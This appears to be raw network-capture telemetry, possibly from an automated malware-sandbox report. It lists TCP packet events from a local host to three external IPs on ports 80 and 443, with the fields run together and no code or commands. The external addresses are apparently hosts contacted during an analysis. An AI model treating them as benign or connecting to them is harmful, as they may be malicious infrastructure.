                                                        Sep 27, 2024 10:27:32.041213989 CEST44349170104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:32.041301012 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:32.043427944 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:32.043445110 CEST44349170104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:32.045429945 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:32.045439005 CEST44349170104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:32.474348068 CEST44349170104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:32.474416971 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:32.474422932 CEST44349170104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:32.474479914 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:32.474554062 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:32.474580050 CEST44349170104.21.64.88192.168.2.22
                                                        Sep 27, 2024 10:27:32.474592924 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:32.474637985 CEST49170443192.168.2.22104.21.64.88
                                                        Sep 27, 2024 10:27:32.478142023 CEST4917180192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:32.483020067 CEST8049171185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:32.483097076 CEST4917180192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:32.483186007 CEST4917180192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:32.488017082 CEST8049171185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:33.100713015 CEST8049171185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:33.100934029 CEST4917180192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.062602043 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.067424059 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.067526102 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.068087101 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.072824001 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691303015 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691323042 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691334963 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691342115 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691346884 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691359043 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691370964 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691390991 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.691406965 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.691421032 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.691426992 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691438913 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691452026 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.691473961 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.691497087 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.696389914 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.696444035 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.696456909 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.696485996 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.696499109 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.696515083 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.696542978 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.696576118 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.777359962 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.777457952 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.779649019 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.779663086 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.779675007 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.779686928 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.779714108 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.779735088 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.779870987 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.779908895 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.779927969 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.779939890 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.779988050 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.780006886 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.780016899 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.780029058 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.780051947 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.780070066 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.780900955 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.780911922 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.780922890 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.780951023 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.780966997 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.781044006 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.781054974 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.781065941 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.781089067 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.781105995 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.781852961 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.781863928 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.781876087 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.781886101 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.781908989 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.781919003 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.781929970 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.781940937 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.781955957 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.781975985 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.784501076 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.784563065 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.784580946 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.784619093 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.868129015 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868145943 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868163109 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868175030 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868187904 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868201971 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868212938 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868227005 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.868238926 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868249893 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868258953 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.868268967 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868279934 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868290901 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.868303061 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.868321896 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.868670940 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868688107 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868699074 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868712902 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868719101 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.868733883 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.868762970 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.868951082 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.868994951 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.869015932 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869031906 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869044065 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869055033 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.869062901 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869080067 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.869093895 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.869293928 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869338036 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.869405031 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869421959 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869431973 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869442940 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869452000 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.869460106 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869472027 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.869477034 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869488001 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869501114 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869505882 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.869514942 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.869522095 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:35.869540930 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:35.869556904 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.056010008 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.060983896 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061006069 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061016083 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061033010 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061043024 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061057091 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061065912 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061065912 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061078072 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061094999 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061125040 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061132908 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061141968 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061150074 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061161041 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061167002 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061176062 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061183929 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061192989 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061202049 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061211109 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061218023 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061235905 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061254978 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061383009 CEST8049172185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:36.061424971 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.061502934 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:36.910851955 CEST4917280192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:38.611455917 CEST8049171185.235.137.223192.168.2.22
                                                        Sep 27, 2024 10:27:38.611617088 CEST4917180192.168.2.22185.235.137.223
                                                        Sep 27, 2024 10:27:40.526741982 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:40.526804924 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:40.526943922 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:40.531084061 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:40.531104088 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.341744900 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.341870070 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:41.347063065 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:41.347079992 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.347496986 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.443116903 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:41.487441063 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.811449051 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.981520891 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.981533051 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.981575966 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.981589079 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.981595993 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.981695890 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:41.981695890 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:41.981743097 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.981771946 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.981794119 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:41.983562946 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.983571053 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.983596087 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.983616114 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.983623028 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.983634949 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:41.983660936 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.983686924 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:41.983690977 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:41.983720064 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.014476061 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.151030064 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.151045084 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.151088953 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.151106119 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.151113033 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.151128054 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.151180983 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.151180983 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.151180983 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.151221037 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.151259899 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.152870893 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.152885914 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.152935028 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.152941942 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.152951002 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.152967930 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.153002024 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.153058052 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.154803038 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.154814005 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.154851913 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.154875994 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.154896021 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.154927969 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.154927969 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.154999971 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.157130003 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.157180071 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.157222033 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.157222033 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.157236099 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321037054 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321095943 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321249008 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.321273088 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321463108 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321472883 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321512938 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321531057 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321537018 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321552038 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.321578979 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321610928 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.321610928 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.321613073 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.321676970 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.322012901 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.322021008 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.322057009 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.322062969 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.322082996 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.322098970 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.322125912 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.322782040 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.322805882 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.322829962 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.322838068 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.322869062 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.322887897 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.322913885 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.326395035 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.326483965 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.367059946 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.367099047 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.367137909 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.367182016 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.367225885 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.367225885 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.367252111 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.367856979 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.367970943 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.409480095 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.409529924 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.409588099 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.409605980 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.409646034 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.410496950 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.619411945 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.619473934 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905045033 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905102015 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905128956 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905145884 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905155897 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905213118 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905241966 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905247927 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905258894 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905272007 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905313015 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905319929 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905371904 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905422926 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905424118 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905437946 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905467987 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905503035 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905543089 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905549049 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905555010 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905586004 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905667067 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905709028 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905716896 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.905721903 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905752897 CEST44349173185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.905791998 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.906630039 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.909661055 CEST49173443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.913577080 CEST49174443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.913605928 CEST44349174185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:42.913656950 CEST49174443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.914235115 CEST49174443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:42.914247990 CEST44349174185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:43.812000990 CEST44349174185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:43.854341984 CEST49174443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:43.854377985 CEST44349174185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:44.295017958 CEST44349174185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:44.467958927 CEST44349174185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:44.467977047 CEST44349174185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:44.468018055 CEST44349174185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:44.468054056 CEST49174443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:44.468076944 CEST44349174185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:44.468092918 CEST49174443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:44.468102932 CEST44349174185.18.213.20192.168.2.22
                                                        Sep 27, 2024 10:27:44.468121052 CEST49174443192.168.2.22185.18.213.20
                                                        Sep 27, 2024 10:27:44.468166113 CEST49174443192.168.2.22185.18.213.20
